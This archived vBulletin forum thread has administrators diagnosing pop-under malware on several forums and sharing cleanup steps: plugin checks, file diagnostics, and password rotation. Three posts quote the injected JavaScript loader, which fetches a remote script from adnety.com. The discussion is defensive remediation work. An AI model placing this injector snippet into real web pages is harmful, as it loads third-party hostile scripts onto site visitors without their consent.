Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 Programming Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 10-11-2016, 07:27 PM
socialteenz's Avatar
socialteenz socialteenz is offline
 
Join Date: May 2011
Posts: 465
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Pop Unders with false click..!

So, basically i have been noticing many vb forums affected by this pop under malware..

What happens is, when you make a click on your site, the pop under appears and it redirects you to these sites..

adnety.com
clicknety.com
namefuze.com

Affected vBulletin Sites so far..

http://www.neogaf.com/forum/showthread.php?t=1229205&page=28

http://www.tsptalk.com/mb/report-problems/26162-pop-ups-anyone-still-seeing-them.html?

http://www.contractortalk.com/f45/virus-pop-up-301393/

https://forums.rajah.com/showthread.php?151343-Pop-ups


FIX:


Quote:
Originally Posted by Trevor Hannant View Post
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.

Best Practices...



1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Check your plugins list for any that are not part of a product you've added:

AdminCP > Plugins & Products > Plugin Manager

Any listed under 'vBulletin' at the top of the list should be examined carefully and removed if you're unsure as to what they are.

3) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

4) Update the following passwords in addition to your AdminCP:

- FTP
- Database

When updating the database password, ensure you also change your config.php file to use the new password otherwise your site won't be able to connect to the database.

5) Secure your AdminCP directory via .htaccess/.htpasswd.

Credits: Trevor Hannant
Reply With Quote
  #2  
Old 10-11-2016, 07:33 PM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
 
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

More than likely hidden in a file, called via referencing a url... could or could not be in base64 format i.e. encrypted per say from reading heck not sure, will know more once I run into this first-hand as with all this crud these terd-nuggets (hacker folks) come up with .
Reply With Quote
  #3  
Old 10-11-2016, 07:35 PM
socialteenz's Avatar
socialteenz socialteenz is offline
 
Join Date: May 2011
Posts: 465
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Update:

The temporary fix to this issue is by disabling the plugin system.

Code:
define('DISABLE_HOOKS', true);
Reply With Quote
  #4  
Old 10-11-2016, 07:40 PM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
 
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

This code is at the top of two of your sites listed, I'd check for that on the site you have access to.

On one site:
Code:
<script type="text/javascript"> 
var win = []; 
win['webid'] = '22357fb864e954c229'; 
win['traffic'] = '0'; 
win['raw'] = '2'; 
win['pop'] = '0'; 
(function() { 
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true; 
var selectGtp = document.getElementsByTagName('script')[0]; 
pGTP.src = 'https://adnety.com/dashboard/call.js'; 
selectGtp.parentNode.insertBefore(pGTP, selectGtp); 
})(); 
</script>
From a completely different site, similar code:
Code:
<script type="text/javascript"> 
var win = []; 
win['webid'] = '78557fb86330ee36940'; 
win['traffic'] = '0'; 
win['raw'] = '2'; 
win['pop'] = '0'; 
(function() { 
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true; 
var selectGtp = document.getElementsByTagName('script')[0]; 
pGTP.src = 'https://adnety.com/dashboard/call.js'; 
selectGtp.parentNode.insertBefore(pGTP, selectGtp); 
})(); 
</script>
Reply With Quote
  #5  
Old 10-11-2016, 07:51 PM
socialteenz's Avatar
socialteenz socialteenz is offline
 
Join Date: May 2011
Posts: 465
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

The site which i have access is undergoing server update, i will get you the details once it's done.

This was the code found on their site..

Code:
<script type="text/javascript">  
var win = [];
win['webid'] = '46157fb85796a03666'; 
win['traffic'] = '0'; 
win['raw'] = '2';  
win['pop'] = '0'; 
(function() {  var pGTP = document.createElement('script'); 
pGTP.type = 'text/javascript'; pGTP.async = true;  
var selectGtp = document.getElementsByTagName('script')[0];  
pGTP.src = 'https://adnety.com/dashboard/call.js';  
selectGtp.parentNode.insertBefore(pGTP, selectGtp);  })();  </script>
Reply With Quote
  #6  
Old 10-11-2016, 07:53 PM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
 
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by socialteenz View Post
The site which i have access is undergoing server update, i will get you the details once it's done.

This was the code found on their site..

PHP Code:
<script type="text/javascript">  var win = [];  win['webid'] = '46157fb85796a03666';  win['traffic'] = '0';  win['raw'] = '2';  win['pop'] = '0';  (function() {  var pGTP document.createElement('script'); pGTP.type 'text/javascript'pGTP.async true;  var selectGtp document.getElementsByTagName('script')[0];  pGTP.src 'https://adnety.com/dashboard/call.js';  selectGtp.parentNode.insertBefore(pGTPselectGtp);  })();  </script
Looks identical to the ones I also found, so look for how that was added or injected, what is in that area of the page on the back-end of the site? A Hook location or what? Trace it down that way . Also once removed check in a day or so and one solid week after to ensure it wasn't added again i.e. shell script left on the site OR code in a file that allows the code to be re-inserted etc etc.

While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).
Reply With Quote
  #7  
Old 10-11-2016, 07:56 PM
socialteenz's Avatar
socialteenz socialteenz is offline
 
Join Date: May 2011
Posts: 465
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by TheLastSuperman View Post
Looks identical to the ones I also found, so look for how that was added or injected, what is in that area of the page on the back-end of the site? A Hook location or what? Trace it down that way . Also once removed check in a day or so and one solid week after to ensure it wasn't added again i.e. shell script left on the site OR code in a file that allows the code to be re-inserted etc etc.

While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).
Sure, thanks for the info.

I am super sleepy as well, 3:25AM at my side of the world.
Reply With Quote
  #8  
Old 10-12-2016, 08:21 AM
Trevor Hannant's Avatar
Trevor Hannant Trevor Hannant is offline
Senior Member
 
Join Date: May 2003
Location: Edinburgh, Scotland
Posts: 111
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.
Reply With Quote
Благодарность от:
socialteenz
  #9  
Old 10-12-2016, 06:57 PM
socialteenz's Avatar
socialteenz socialteenz is offline
 
Join Date: May 2011
Posts: 465
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Trevor Hannant View Post
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.
Yup, right on.

Thanks.
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 11:21 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04391 seconds
  • Memory Usage 2,271KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (4)bbcode_code
  • (1)bbcode_php
  • (4)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (9)post_thanks_box
  • (1)post_thanks_box_bit
  • (9)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (1)post_thanks_postbit
  • (9)post_thanks_postbit_info
  • (9)postbit
  • (9)postbit_onlinestatus
  • (9)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete